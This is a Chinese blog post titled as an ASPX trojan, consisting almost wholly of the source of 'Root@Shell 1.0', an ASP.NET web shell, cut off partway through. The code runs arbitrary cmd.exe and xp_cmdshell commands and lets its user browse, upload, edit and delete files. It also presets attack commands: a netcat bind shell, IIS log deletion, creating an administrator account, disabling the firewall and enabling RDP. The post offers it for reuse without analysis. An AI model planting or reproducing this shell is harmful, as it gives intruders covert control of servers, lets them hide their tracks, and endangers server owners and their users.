aspx马

最新推荐文章于 2024-08-16 08:30:00 发布
最新推荐文章于 2024-08-16 08:30:00 发布
阅读量1.1k 收藏
点赞数
文章标签: textbox server button class url asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanyunfei123/article/details/2852198
版权

<%@ Page Language="VB" ContentType="text/html"  validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<script runat="server">
Dim PASSWORD as string = "mima"

'----------------------------------------------------------------------------------------------------------------
'-----------------              Root@Shell by Silentz         -----------------
'-----------------          E-mail: bartsimpson912@hotmail.com     -----------------
'-----------------                http://www.team-rootshell.com    -----------------
'-----------------    IRC: ABS.lcirc.net or irc.milw0rm.com    -----------------
'-----------------     Channel: #rootshell     -----------------
'-----------------                 -----------------
'-----------------                         Version 1.0          -----------------
'-----------------                 `   Build (04/10/06)        -----------------
'-----------------                                    -----------------
'-----------------     Shoutz: Preddy, Stansar, IronFist and all my other RootShell Peepz       -----------------
'-----------------            -----------------
'----------------------------------------------------------------------------------------------------------------

 


dim url,TEMP1,TEMP2,TITLE as string
Sub Login_click(sender As Object, E As EventArgs)
 if Textbox.Text=PASSWORD then    
  session("rootshell")=1
  session.Timeout=45
 else
  response.Write("<font color='red'>Your password is incorrect! Please check your password and try again.</font><br>")
 end if
End Sub
Sub RunCMD(Src As Object, E As EventArgs)
 Dim myProcess As New Process()
 Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo.UseShellExecute = False
 myProcessStartInfo.RedirectStandardOutput = true
 myProcess.StartInfo = myProcessStartInfo
 myProcessStartInfo.Arguments="/c " & Cmd.text
 myProcess.Start()
 Dim myStreamReader As StreamReader = myProcess.StandardOutput
 Dim myString As String = myStreamReader.Readtoend()
 myProcess.Close()
 mystring=replace(mystring,">","&lt;")
 mystring=replace(mystring,"<","&gt;")
 result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
 Cmd.text=""
End Sub
Sub RunCMD2(Src As Object, E As EventArgs)
 Dim myProcess2 As New Process()
 Dim myProcessStartInfo2 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo2.UseShellExecute = False
 myProcessStartInfo2.RedirectStandardOutput = true
 myProcess2.StartInfo = myProcessStartInfo2
 myProcessStartInfo2.Arguments="/c " & Cmd2.text
 myProcess2.Start()
 Dim myStreamReader2 As StreamReader = myProcess2.StandardOutput
 Dim myString2 As String = myStreamReader2.Readtoend()
 myProcess2.Close()
 mystring2=replace(mystring2,">","&lt;")
 mystring2=replace(mystring2,"<","&gt;")
 result.text=Cmd2.text & vbcrlf & "<pre>" & mystring2 & "</pre>"
 Cmd2.text=""
End Sub
Sub RunCMD3(Src As Object, E As EventArgs)
 Dim myProcess3 As New Process()
 Dim myProcessStartInfo3 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo3.UseShellExecute = False
 myProcessStartInfo3.RedirectStandardOutput = true
 myProcess3.StartInfo = myProcessStartInfo3
 myProcessStartInfo3.Arguments="/c " & Cmd3.text
 myProcess3.Start()
 Dim myStreamReader3 As StreamReader = myProcess3.StandardOutput
 Dim myString3 As String = myStreamReader3.Readtoend()
 myProcess3.Close()
 mystring3=replace(mystring3,">","&lt;")
 mystring3=replace(mystring3,"<","&gt;")
 result.text=Cmd3.text & vbcrlf & "<pre>" & mystring3 & "</pre>"
 Cmd3.text=""
End Sub
Sub RunCMD4(Src As Object, E As EventArgs)
 Dim myProcess4 As New Process()
 Dim myProcessStartInfo4 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo4.UseShellExecute = False
 myProcessStartInfo4.RedirectStandardOutput = true
 myProcess4.StartInfo = myProcessStartInfo4
 myProcessStartInfo4.Arguments="/c " & Cmd4.text
 myProcess4.Start()
 Dim myStreamReader4 As StreamReader = myProcess4.StandardOutput
 Dim myString4 As String = myStreamReader4.Readtoend()
 myProcess4.Close()
 mystring4=replace(mystring4,">","&lt;")
 mystring4=replace(mystring4,"<","&gt;")
 result.text=Cmd4.text & vbcrlf & "<pre>" & mystring4 & "</pre>"
 Cmd4.text=""
End Sub
Sub RunCMD5(Src As Object, E As EventArgs)
 Dim myProcess5 As New Process()
 Dim myProcessStartInfo5 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo5.UseShellExecute = False
 myProcessStartInfo5.RedirectStandardOutput = true
 myProcess5.StartInfo = myProcessStartInfo5
 myProcessStartInfo5.Arguments="/c " & Cmd5.text
 myProcess5.Start()
 Dim myStreamReader5 As StreamReader = myProcess5.StandardOutput
 Dim myString5 As String = myStreamReader5.Readtoend()
 myProcess5.Close()
 mystring5=replace(mystring5,">","&lt;")
 mystring5=replace(mystring5,"<","&gt;")
 result.text=Cmd5.text & vbcrlf & "<pre>" & mystring5 & "</pre>"
 Cmd5.text=""
End Sub
Sub RunCMD6(Src As Object, E As EventArgs)
 Dim myProcess6 As New Process()
 Dim myProcessStartInfo6 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo6.UseShellExecute = False
 myProcessStartInfo6.RedirectStandardOutput = true
 myProcess6.StartInfo = myProcessStartInfo6
 myProcessStartInfo6.Arguments="/c " & Cmd6.text
 myProcess6.Start()
 Dim myStreamReader6 As StreamReader = myProcess6.StandardOutput
 Dim myString6 As String = myStreamReader6.Readtoend()
 myProcess6.Close()
 mystring6=replace(mystring6,">","&lt;")
 mystring6=replace(mystring6,"<","&gt;")
 result.text=Cmd6.text & vbcrlf & "<pre>" & mystring6 & "</pre>"
 Cmd6.text=""
End Sub
Sub RunCMD7(Src As Object, E As EventArgs)
 Dim myProcess7 As New Process()
 Dim myProcessStartInfo7 As New ProcessStartInfo("cmd.exe")
 myProcessStartInfo7.UseShellExecute = False
 myProcessStartInfo7.RedirectStandardOutput = true
 myProcess7.StartInfo = myProcessStartInfo7
 myProcessStartInfo7.Arguments="/c " & Cmd7.text
 myProcess7.Start()
 Dim myStreamReader7 As StreamReader = myProcess7.StandardOutput
 Dim myString7 As String = myStreamReader7.Readtoend()
 myProcess7.Close()
 mystring7=replace(mystring7,">","&lt;")
 mystring7=replace(mystring7,"<","&gt;")
 result.text=Cmd7.text & vbcrlf & "<pre>" & mystring7 & "</pre>"
 Cmd7.text=""
End Sub
sub Editor(Src As Object, E As EventArgs)
 dim mywrite as new streamwriter(filepath.text,false,encoding.default)
 mywrite.write(content.text)
 mywrite.close
 response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
 dim filename,loadpath as string
 filename=path.getfilename(UpFile.value)
 loadpath=request.QueryString("src") & filename
 if  file.exists(loadpath)=true then
  response.Write("<script>alert('File " & replace(loadpath,"/","//") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  response.End()
 end if
 UpFile.postedfile.saveas(loadpath)
 response.Write("<script>alert('File " & filename & " upload success!/nFile info:/n/nClient Path:" & replace(UpFile.value,"/","//") & "/nFile Size:" & UpFile.postedfile.contentlength & " bytes/nSave Path:" & replace(loadpath,"/","//") & "/n');")
 response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub

Sub NewFD(Src As Object, E As EventArgs)
 url=request.form("src")
 if NewFile.Checked = True then
  dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  mywrite.close
  response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
 else
  directory.createdirectory(url & NewName.Text)
  response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
 end if
End Sub
Sub del(a)
 if right(a,1)="/" then
  dim xdir as directoryinfo
  dim mydir as new DirectoryInfo(a)
  dim xfile as fileinfo
  for each xfile in mydir.getfiles()
   file.delete(a & xfile.name)
  next
  for each xdir in mydir.getdirectories()
   call del(a & xdir.name & "/")
  next
  directory.delete(a)
 else
  file.delete(a)
 end if
End Sub
Sub copydir(a,b)
 dim xdir as directoryinfo
 dim mydir as new DirectoryInfo(a)
 dim xfile as fileinfo
 for each xfile in mydir.getfiles()
  file.copy(a & "/" & xfile.name,b & xfile.name)
 next
 for each xdir in mydir.getdirectories()
  directory.createdirectory(b & path.getfilename(a & xdir.name))
  call copydir(a & xdir.name & "/",b & xdir.name & "/")
 next
End Sub
Sub xexistdir(temp,ow)
 if directory.exists(temp)=true or file.exists(temp)=true then
  if ow=0  then
   response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  elseif ow=1 then
   del(temp)
  else
   dim d as string = session("cutboard")
   if right(d,1)="/" then
    TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
   else
    TEMP2=url & second(now) & replace(path.getfilename(d),"","")
   end if
  end if
 end if
End Sub
Sub existdir(temp)
  if  file.exists(temp)=false and directory.exists(temp)=false then
   response.Write("<center>This drive is not an accessible drive...</center>")  
   response.End()
  end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
 Dim adoConn,strQuery,recResult,strResult
 if SqlName.Text<>"" then
  adoConn=Server.CreateObject("ADODB.Connection")
  adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  If Sqlcmd.Text<>"" Then
   strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
     recResult = adoConn.Execute(strQuery)
     If NOT recResult.EOF Then
       Do While NOT recResult.EOF
        strResult = strResult & chr(13) & recResult(0).value
        recResult.MoveNext
       Loop
     End if
     recResult = Nothing
     strResult = Replace(strResult," ","&nbsp;")
     strResult = Replace(strResult,"<","&lt;")
     strResult = Replace(strResult,">","&gt;")
   resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
   SqlCMD.Text=""
   End if
    adoConn.Close
  End if
 End Sub
Function GetStartedTime(ms)
 GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP()
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
 dim temp,k as integer
 temp=1
 k=0
 if len(nowdir)>4 then
  nowdir=left(nowdir,len(nowdir)-1)
 end if
 do while temp<>0
  k=temp+1
  temp=instr(temp,nowdir,"/")
  if temp =0 then
   exit do
  end if
  temp = temp+1
 loop
 if k<>2 then
  getparentdir=mid(nowdir,1,k-2)
 else
  getparentdir=nowdir
 end if
End function
Function Rename()
 url=request.QueryString("src")
 if file.exists(Getparentdir(url) & request.Form("name")) then
  rename=0  
 else
  file.copy(url,Getparentdir(url) & request.Form("name"))
  del(url)
  rename=1
 end if
End Function
Function GetSize(temp)
 if temp < 1024 then
  GetSize=temp & " bytes"
 else
  if temp/1024 < 1024 then
   GetSize=temp/1024 & " KB"
  else
   if temp/1024/1024 < 1024 then
    GetSize=temp/1024/1024 & " MB"
   else
    GetSize=temp/1024/1024/1024 & " GB"
   end if
  end if
 end if
End Function
 Sub downTheFile(thePath)
  dim stream
  stream=server.createObject("adodb.stream")
  stream.open
  stream.type=1
  stream.loadFromFile(thePath)
  response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  response.addHeader("Content-Length",stream.Size)
  response.charset="UTF-8"
  response.contentType="application/octet-stream"
  response.binaryWrite(stream.read)
  response.flush
  stream.close
  stream=nothing
  response.End()
 End Sub
</script>
<%
if request.QueryString("action")="down" and session("rootshell")=1 then
  downTheFile(request.QueryString("src"))
  response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then
TITLE="CMD.NET"
elseif hu="sqlrootkit" then
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then
TITLE="Clone Time"
elseif hu="information" then
TITLE="Web Server Info"
elseif hu="goto" then
TITLE="Root@Shell::2006"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
 color: #FFFFFF;
 font-family: Comic Sans Ms;
}
body {
 background-image: url("http://img526.imageshack.us/img526/9563/rootshell3ek5mh2.png");
 background-position: center center;
 background-repeat: no-repeat;
 background-color: #000000;
 background-attachment: fixed;
 font-family: Comic Sans MS;
 font-size: 16px;
}
a:link {
 color: #FFFFFF;
 text-decoration: none;
}
a:visited {
 text-decoration: none;
 color: #FFFFFF;
}
a:hover {
 text-decoration: none;
 color: #00FF00;
}
a:active {
 text-decoration: none;
 color: #00FF00;
}
.button {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #00FF00}
.text {font-family: Comic Sans MS; font-size: 18px}
.title {font-family: Comic Sans MS; font-size: 22px;}
.footer {font-size: 12px;}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title>Root@Shell 1.0 By Silentz</title>
</head>
<body>
<%
Dim error_x as Exception
Try
if session("rootshell")<>1 then
 response.Write("<br>")
 response.Write("<center><span class=""title""><b>Welcome to Root@Shell</b></span></center><br>")
 response.Write("<center><span class=""style3"">Note:</span> You MUST click the login button and not hit enter.</center>")
%>
<form runat="server">
  <br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<center>Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" /> 
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="button" /></center>
</form>
<%
else
 dim temp as string
 temp=request.QueryString("action")
 if temp="" then temp="goto"
 select case temp
 case "goto"
  if request.QueryString("src")<>"" then
   url=request.QueryString("src")
  else
   url=server.MapPath(".") & "/"
  end if
 call existdir(url)
 dim xdir as directoryinfo
 dim mydir as new DirectoryInfo(url)
 dim hupo as string
 dim xfile as fileinfo
%>
<p align="center">Current Directory: <font color= #00FF00><%=url%></font></p>
<table width="75%"  border="0" align="center">
  <tr>
    <td width="13%">Action:</td>
    <td width="87%">
    <a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> |
    <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file"> Upload</a> |
    <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory"> Index Root</a> |
    <a href="?action=logout" title="Exit"> Exit</a></td>
  </tr>
  <tr>
    <td>
 Drive: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
  response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
  </tr>

  <tr>
    <td>Tools:</td>
    <td><a href="?action=sqlrootkit" target="_blank">SQL Command</a> |<a href="?action=cmd" target="_blank"> Command Line</a> |<a href="?action=information" target="_blank"> System Information</a></td>
  </tr>
 
  <tr>
   <td width="20%">Admin Tricks: </td>
   <td width="80%"><a href="?action=cmd5" target="_blank">Add User</a> |<a href="?action=cmd6" target="_blank"> Add User To Administrators Group</a> |<a href="?action=cmd7" target="_blank"> Disable Windows Firewall</a> |<a href="?action=cmd4" target="_blank"> Enable RDP</a> |<a href="?action=cmd3" target="_blank"> Wipe IIS Logs</a></td>

  </tr>

  <tr>
   <td width="20%">Silentz's Tricks: </td>
   <td width="80%"><a href="?action=cmd2" target="_blank">Start NC</a></td>
  </tr>
</table>
<hr noshade width="70%">
<table width="90%"  border="0" align="center">
 <tr>
 <td width="30%"><strong>Name</strong></td>
 <td width="10%"><strong>Size</strong></td>
 <td width="20%"><strong>Last Modified</strong></td>
 <td width="25%"><strong>Action</strong></td>
 </tr>
      <tr>
        <td><%
  hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
  response.Write(hupo)
  for each xdir in mydir.getdirectories()
   response.Write("<tr>")
   dim filepath as string
   filepath=server.UrlEncode(url & xdir.name)
   hupo= "<td><a href='?action=goto&src=" & filepath & "/" & "'>" & xdir.name & "</a></td>"
   response.Write(hupo)
   response.Write("<td>&lt;dir&gt;</td>")
   response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
   hupo="<td><a href='?action=cut&src=" & filepath & "/'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "/'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "/'" & " οnclick='return del(this);'>Del</a></td>"
   response.Write(hupo)
   response.Write("</tr>")
  next
  %></td>
  </tr>
  <tr>
        <td><%
  for each xfile in mydir.getfiles()
   dim filepath2 as string
   filepath2=server.UrlEncode(url & xfile.name)
   response.Write("<tr>")
   hupo="<td>" & xfile.name & "</td>"
   response.Write(hupo)
   hupo="<td>" & GetSize(xfile.length) & "</td>"
   response.Write(hupo)
   response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
   hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
   response.Write(hupo)
   response.Write("</tr>")
  next
  response.Write("</table>")
  %></td>
      </tr>
     
      <tr>
 <td><hr noshade width="70%"></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,/nPlease don/'t download/nYou can copy file to web directory ,use http download/nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
 dim CIP,CP as string
 if getIP()<>request.ServerVariables("REMOTE_ADDR") then
   CIP=getIP()
   CP=request.ServerVariables("REMOTE_ADDR")
 else
   CIP=request.ServerVariables("REMOTE_ADDR")
   CP="None"
 end if
%>
<center><p>[ System information ]</p><br/>
<table width="80%"  border="1" align="center">
  <tr>
    <td colspan="2"><span class="style3"><b>Web Server Information</b></span></td>
  </tr>
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3"><b>Client Infomation</b></span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
<%
 case "cmd"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="button"/></center>
  <p>
   <asp:Label ID="result" runat="server" style="style2"/></p>
</form>
<%
 case "cmd2"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd2" runat="server" Width="300" class="TextBox" text="nc -l -v -p 12345 -d -e cmd.exe"/>
  <asp:Button ID="Button1234" runat="server" Text="Run" OnClick="RunCMD2" class="button" /></center>
  <p>
   <asp:Label ID="result2" runat="server" style="style2"/></p>
</form>
<%
 case "cmd3"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd3" runat="server" Width="300" class="TextBox" text="del C:/WINDOWS/system32/LogFiles/W3SVC1/*.log"/>
  <asp:Button ID="Button12345" runat="server" Text="Run" OnClick="RunCMD3" class="button" /></center>
  <p>
   <asp:Label ID="result3" runat="server" style="style2"/></p>
</form>
<%
 case "cmd4"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd4" runat="server" Width="300" class="TextBox" text="reg add hklm/system/currentControlSet/Control/Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"/>
  <asp:Button ID="Button123456" runat="server" Text="Run" OnClick="RunCMD4" class="button" /></center>
  <p>
   <asp:Label ID="result4" runat="server" style="style2"/></p>
</form><%
 case "cmd5"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd5" runat="server" Width="300" class="TextBox" text="net user USERNAME PASSWORD /add"/>
  <asp:Button ID="Button1234567" runat="server" Text="Run" OnClick="RunCMD5" class="button" /></center>
  <p>
   <asp:Label ID="result5" runat="server" style="style2"/></p>
</form>
<%
 case "cmd6"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd6" runat="server" Width="300" class="TextBox" text="net localgroup Administrators USERNAME /add"/>
  <asp:Button ID="Button12345678" runat="server" Text="Run" OnClick="RunCMD6" class="button" /></center>
  <p>
   <asp:Label ID="result6" runat="server" style="style2"/></p>
</form>
<%
 case "cmd7"
%>
<form runat="server">
  <center><p>[ Command Prompt ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  Command:
  <asp:TextBox ID="cmd7" runat="server" Width="300" class="TextBox" text="reg add HKLM/SYSTEM/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile /v EnableFirewall /t REG_DWORD /d 0x0 /f"/>
  <asp:Button ID="Button123456789" runat="server" Text="Run" OnClick="RunCMD7" class="button" /></center>
  <p>
   <asp:Label ID="result7" runat="server" style="style2"/></p>
</form>
<%
 case "sqlrootkit"
%>
<form runat="server">
  <center><p>[ SQL Command ]</p>
  <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  <p>SQL Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Username:
    <asp:TextBox ID="SqlName" runat="server" Width="110" class="TextBox" Text='Username'/><br/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="110" class="TextBox"  Text='Password'/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="button"/> 
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/></p></center>
</form>
<%
 case "del"
  dim a as string
  a=request.QueryString("src")
  call existdir(a)
  call del(a) 
  response.Write("<script>alert(""Delete " & replace(a,"/","//") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
 case "copy"
  call existdir(request.QueryString("src"))
  session("cutboard")="" & request.QueryString("src")
  response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
 case "cut"
  call existdir(request.QueryString("src"))
  session("cutboard")="" & request.QueryString("src")
  response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
 case "plaster"
  dim ow as integer
  if request.Form("OverWrite")<>"" then ow=1
  if request.Form("Cancel")<>"" then ow=2
  url=request.QueryString("src")
  call existdir(url)
  dim d as string
  d=session("cutboard")
  if left(d,1)="" then
   TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
   TEMP2=url & replace(path.getfilename(d),"","")
   if right(d,1)="/" then  
    call xexistdir(TEMP1,ow)
    directory.move(replace(d,"",""),TEMP1 & "/") 
    response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"/","//") & "  to  " & replace(TEMP1 & "/","/","//") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   else
    call xexistdir(TEMP2,ow)
    file.move(replace(d,"",""),TEMP2)
    response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"/","//") & "  to  " & replace(TEMP2,"/","//") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   end if
  else
   TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
   TEMP2=url & path.getfilename(replace(d,"",""))
   if right(d,1)="/" then
    call xexistdir(TEMP1,ow)
    directory.createdirectory(TEMP1)
    call copydir(replace(d,"",""),TEMP1 & "/")
    response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"/","//") & "  to  " & replace(TEMP1 & "/","/","//") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   else
    call xexistdir(TEMP2,ow)
    file.copy(replace(d,"",""),TEMP2)
    response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"/","//") & "  to  " & replace(TEMP2,"/","//") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   end if
  end if
 case "upfile"
  url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
 <center>Files will be uploaded to: <span class="style3"><%=url%></span><br>
 Upload:
 <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"><br><br>
    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="button"></center>
</form>
<%
 case "new"
  url=request.QueryString("src")
%>
<form runat="server">
  <center><%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  <br><br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="button"  OnClick="NewFD"/> 
  <input name="Src" type="hidden" value="<%=url%>"></center>
</form>
<%
 case "edit"
  dim b as string
  b=request.QueryString("src")
  call existdir(b)
  dim myread as new streamreader(b,encoding.default)
  filepath.text=b
  content.text=myread.readtoend
%>
<form runat="server">
  <table width="80%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td>
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="button"/>        
      </td>
    </tr>
  </table>
</form>
<%
    myread.close
 case "rename"
  url=request.QueryString("src")
  if request.Form("name")="" then
 %>
